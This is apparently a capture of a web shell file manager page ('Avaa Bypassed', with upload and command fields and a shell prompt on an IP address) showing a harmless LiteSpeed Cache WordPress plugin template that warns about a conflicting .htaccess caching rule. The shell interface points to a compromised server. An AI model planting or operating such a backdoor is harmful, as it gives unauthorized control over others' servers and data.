404

[ Avaa Bypassed ]




Upload:

Command:

elspacio@18.119.192.221: ~ $
<?php
namespace LiteSpeed;
defined('WPINC') || exit();

$err = sprintf(
	__(
		'Unexpected cache rule %2$s found in %1$s file. This rule may cause visitors to see old versions of pages due to the browser caching HTML pages. If you are sure that HTML pages are not being browser cached, this message can be dismissed. (<a %3$s>Learn More</a>)',
		'litespeed-cache'
	),
	'.htaccess',
	'`ExpiresDefault`',
	'href="https://docs.litespeedtech.com/lscache/lscwp/troubleshoot/#browser-displays-stale-content" target="_blank"'
);

// other plugin left cache expired rules in .htaccess which will cause conflicts
echo self::build_notice(self::NOTICE_YELLOW . ' lscwp-notice-ruleconflict', $err);

Filemanager

Name Type Size Permission Actions
admin_footer.php File 1.54 KB 0644
api_key.php File 294 B 0644
check_cache_disabled.php File 1.55 KB 0644
check_if_network_disable_all.php File 623 B 0644
disabled_all.php File 259 B 0644
in_upgrading.php File 241 B 0644
metabox.php File 1.07 KB 0644
modal.footer.php File 9 B 0644
modal.header.php File 502 B 0644
show_display_installed.php File 1.34 KB 0644
show_error_cookie.php File 682 B 0644
show_rule_conflict.php File 687 B 0644